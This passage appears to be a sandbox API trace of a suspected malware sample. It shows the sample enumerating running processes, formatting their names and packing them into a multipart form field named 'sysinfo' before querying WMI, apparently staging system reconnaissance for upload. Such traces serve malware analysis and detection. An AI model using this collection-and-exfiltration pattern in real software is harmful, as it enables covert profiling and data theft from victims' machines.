	[0217.420] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x2a6) returned 0x29a0b0
	[0217.420] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0217.420] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="taskeng.exe\r\n") returned 13
	[0217.420] lstrlenW (lpString="taskeng.exe\r\n") returned 13
	[0217.420] GetProcessHeap () returned 0x270000
	[0217.420] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x2c0) returned 0x29a0b0
	[0217.420] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.421] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.421] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.421] GetProcessHeap () returned 0x270000
	[0217.421] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x2da) returned 0x29a0b0
	[0217.421] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0217.422] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="WmiPrvSE.exe\r\n") returned 14
	[0217.422] lstrlenW (lpString="WmiPrvSE.exe\r\n") returned 14
	[0217.422] GetProcessHeap () returned 0x270000
	[0217.422] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x2f6) returned 0x29a0b0
	[0217.422] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0217.423] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="sppsvc.exe\r\n") returned 12
	[0217.423] lstrlenW (lpString="sppsvc.exe\r\n") returned 12
	[0217.423] GetProcessHeap () returned 0x270000
	[0217.423] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x30e) returned 0x29a0b0
	[0217.423] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0217.423] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="dwm.exe\r\n") returned 9
	[0217.423] lstrlenW (lpString="dwm.exe\r\n") returned 9
	[0217.423] GetProcessHeap () returned 0x270000
	[0217.423] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x320) returned 0x29a0b0
	[0217.423] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0217.424] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="explorer.exe\r\n") returned 14
	[0217.424] lstrlenW (lpString="explorer.exe\r\n") returned 14
	[0217.424] GetProcessHeap () returned 0x270000
	[0217.424] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x33c) returned 0x29a0b0
	[0217.424] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0217.425] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="audiodg.exe\r\n") returned 13
	[0217.425] lstrlenW (lpString="audiodg.exe\r\n") returned 13
	[0217.425] GetProcessHeap () returned 0x270000
	[0217.425] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x356) returned 0x29a0b0
	[0217.425] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0217.425] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="shirts_cumshots_compaq.exe\r\n") returned 28
	[0217.425] lstrlenW (lpString="shirts_cumshots_compaq.exe\r\n") returned 28
	[0217.425] GetProcessHeap () returned 0x270000
	[0217.425] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x38e) returned 0x29a0b0
	[0217.425] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0217.426] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="league.exe\r\n") returned 12
	[0217.426] lstrlenW (lpString="league.exe\r\n") returned 12
	[0217.426] GetProcessHeap () returned 0x270000
	[0217.426] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x3a6) returned 0x29a0b0
	[0217.426] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0217.427] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="js_sound.exe\r\n") returned 14
	[0217.427] lstrlenW (lpString="js_sound.exe\r\n") returned 14
	[0217.427] GetProcessHeap () returned 0x270000
	[0217.427] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x3c2) returned 0x29a0b0
	[0217.427] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0217.428] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="beast-dry.exe\r\n") returned 15
	[0217.428] lstrlenW (lpString="beast-dry.exe\r\n") returned 15
	[0217.428] GetProcessHeap () returned 0x270000
	[0217.428] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x3e0) returned 0x29a0b0
	[0217.428] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0217.428] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="forecastsgeographic.exe\r\n") returned 25
	[0217.428] lstrlenW (lpString="forecastsgeographic.exe\r\n") returned 25
	[0217.428] GetProcessHeap () returned 0x270000
	[0217.428] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x412) returned 0x29a0b0
	[0217.429] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0217.429] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="reno.exe\r\n") returned 10
	[0217.429] lstrlenW (lpString="reno.exe\r\n") returned 10
	[0217.429] GetProcessHeap () returned 0x270000
	[0217.430] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x426) returned 0x29a0b0
	[0217.430] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0217.430] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="specreformwear.exe\r\n") returned 20
	[0217.430] lstrlenW (lpString="specreformwear.exe\r\n") returned 20
	[0217.431] GetProcessHeap () returned 0x270000
	[0217.431] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x44e) returned 0x29a0b0
	[0217.431] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0217.431] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="rr_publications.exe\r\n") returned 21
	[0217.431] lstrlenW (lpString="rr_publications.exe\r\n") returned 21
	[0217.431] GetProcessHeap () returned 0x270000
	[0217.431] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x478) returned 0x29a0b0
	[0217.432] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0217.432] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="solo.exe\r\n") returned 10
	[0217.432] lstrlenW (lpString="solo.exe\r\n") returned 10
	[0217.432] GetProcessHeap () returned 0x270000
	[0217.432] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x48c) returned 0x29a0b0
	[0217.432] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0217.433] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="beam.exe\r\n") returned 10
	[0217.433] lstrlenW (lpString="beam.exe\r\n") returned 10
	[0217.433] GetProcessHeap () returned 0x270000
	[0217.433] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x4a0) returned 0x29a0b0
	[0217.433] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0217.434] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="configurations.exe\r\n") returned 20
	[0217.434] lstrlenW (lpString="configurations.exe\r\n") returned 20
	[0217.434] GetProcessHeap () returned 0x270000
	[0217.434] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x4c8) returned 0x29a0b0
	[0217.434] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0217.434] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="fact-film-anticipated.exe\r\n") returned 27
	[0217.435] lstrlenW (lpString="fact-film-anticipated.exe\r\n") returned 27
	[0217.435] GetProcessHeap () returned 0x270000
	[0217.435] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x4fe) returned 0x29a0b0
	[0217.435] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0217.435] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="wanting villages.exe\r\n") returned 22
	[0217.435] lstrlenW (lpString="wanting villages.exe\r\n") returned 22
	[0217.435] GetProcessHeap () returned 0x270000
	[0217.435] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x52a) returned 0x29a0b0
	[0217.435] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0217.436] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="engagementresearchersmonkey.exe\r\n") returned 33
	[0217.436] lstrlenW (lpString="engagementresearchersmonkey.exe\r\n") returned 33
	[0217.436] GetProcessHeap () returned 0x270000
	[0217.436] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x56c) returned 0x29a0b0
	[0217.436] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0217.437] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="surgical-marcus.exe\r\n") returned 21
	[0217.437] lstrlenW (lpString="surgical-marcus.exe\r\n") returned 21
	[0217.437] GetProcessHeap () returned 0x270000
	[0217.437] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x596) returned 0x29a0b0
	[0217.437] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0217.438] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="iexplore.exe\r\n") returned 14
	[0217.438] lstrlenW (lpString="iexplore.exe\r\n") returned 14
	[0217.438] GetProcessHeap () returned 0x270000
	[0217.438] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x5b2) returned 0x29a0b0
	[0217.438] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0217.438] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="iexplore.exe\r\n") returned 14
	[0217.438] lstrlenW (lpString="iexplore.exe\r\n") returned 14
	[0217.438] GetProcessHeap () returned 0x270000
	[0217.438] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x5ce) returned 0x29a0b0
	[0217.438] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0217.439] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="taskeng.exe\r\n") returned 13
	[0217.439] lstrlenW (lpString="taskeng.exe\r\n") returned 13
	[0217.439] GetProcessHeap () returned 0x270000
	[0217.439] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x5e8) returned 0x29a0b0
	[0217.439] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0217.440] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="tadiapce.exe\r\n") returned 14
	[0217.440] lstrlenW (lpString="tadiapce.exe\r\n") returned 14
	[0217.440] GetProcessHeap () returned 0x270000
	[0217.440] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x604) returned 0x29a0b0
	[0217.440] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.441] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.441] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.441] GetProcessHeap () returned 0x270000
	[0217.441] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x61e) returned 0x29a0b0
	[0217.441] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.442] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.442] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.442] GetProcessHeap () returned 0x270000
	[0217.442] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x638) returned 0x29a0b0
	[0217.442] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.443] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.443] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.443] GetProcessHeap () returned 0x270000
	[0217.443] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x652) returned 0x29a0b0
	[0217.443] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0217.443] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="dllhost.exe\r\n") returned 13
	[0217.443] lstrlenW (lpString="dllhost.exe\r\n") returned 13
	[0217.443] GetProcessHeap () returned 0x270000
	[0217.443] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x66c) returned 0x29a0b0
	[0217.443] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.444] _vsnwprintf_s (in: _Buffer=0x170ed70, _BufferCount=0x400, _MaxCount=0x3ff, _Format="%s\r\n", _ArgList=0x170f580 | out: _Buffer="svchost.exe\r\n") returned 13
	[0217.444] lstrlenW (lpString="svchost.exe\r\n") returned 13
	[0217.444] GetProcessHeap () returned 0x270000
	[0217.444] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x686) returned 0x29a0b0
	[0217.444] Process32NextW (in: hSnapshot=0x9c, lppe=0x170f58c | out: lppe=0x170f58c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0217.445] _vsnwprintf_s (in: _Buffer=0x170ed74, _BufferCount=0x400, _MaxCount=0x3ff, _Format="\r\n\r\n", _ArgList=0x170f584 | out: _Buffer="\r\n\r\n") returned 4
	[0217.445] lstrlenW (lpString="\r\n\r\n") returned 4
	[0217.445] GetProcessHeap () returned 0x270000
	[0217.445] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x68e) returned 0x29a0b0
	[0217.445] CloseHandle (hObject=0x9c) returned 1
	[0217.445] _vsnwprintf_s (in: _Buffer=0x170efac, _BufferCount=0x400, _MaxCount=0x3ff, _Format="--%s\r\n", _ArgList=0x170f7bc | out: _Buffer="--Arasfjasu7\r\n") returned 14
	[0217.445] lstrlenW (lpString="--Arasfjasu7\r\n") returned 14
	[0217.445] GetProcessHeap () returned 0x270000
	[0217.445] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x6aa) returned 0x29a0b0
	[0217.445] _vsnwprintf_s (in: _Buffer=0x170efb0, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Content-Disposition: form-data; name=\"sysinfo\"\r\n\r\n", _ArgList=0x170f7c0 | out: _Buffer="Content-Disposition: form-data; name=\"sysinfo\"\r\n\r\n") returned 50
	[0217.445] lstrlenW (lpString="Content-Disposition: form-data; name=\"sysinfo\"\r\n\r\n") returned 50
	[0217.445] GetProcessHeap () returned 0x270000
	[0217.445] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x70e) returned 0x29a0b0
	[0217.445] _vsnwprintf_s (in: _Buffer=0x170ee60, _BufferCount=0x400, _MaxCount=0x3ff, _Format="\x09\x09***SYSTEMINFO***\r\n\r\n", _ArgList=0x170f670 | out: _Buffer="\x09\x09***SYSTEMINFO***\r\n\r\n") returned 22
	[0217.445] lstrlenW (lpString="\x09\x09***SYSTEMINFO***\r\n\r\n") returned 22
	[0217.445] GetProcessHeap () returned 0x270000
	[0217.445] RtlReAllocateHeap (Heap=0x270000, Flags=0x8, Ptr=0x29a0b0, Size=0x73a) returned 0x29a0b0
	[0217.445] CoCreateInstance (in: rclsid=0x10004230*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x10004160*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x170f7a8 | out: ppv=0x170f7a8*=0x1c80828) returned 0x0
	[0217.460] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c80828, strNetworkResource="", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x170f7b0 | out: ppNamespace=0x170f7b0*=0x1c8c744) returned 0x0
	[0217.522] CoSetProxyBlanket (pProxy=0x1c8c744, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
	[0217.522] IWbemServices:ExecQuery (in: This=0x1c8c744, strQueryLanguage="WQL", strQuery="", lFlags=48, pCtx=0x0, ppEnum=0x170f7ac | out: ppEnum=0x170f7ac*=0x1c8c7e4) returned 0x0
	[0217.526] IEnumWbemClassObject:Next (in: This=0x1c8c7e4, lTimeout=-1, uCount=0x1, apObjects=0x170f7b4, puReturned=0x170f7a4 | out: apObjects=0x170f7b4*=0x1c8c820, puReturned=0x170f7a4*=0x1) returned 0x0
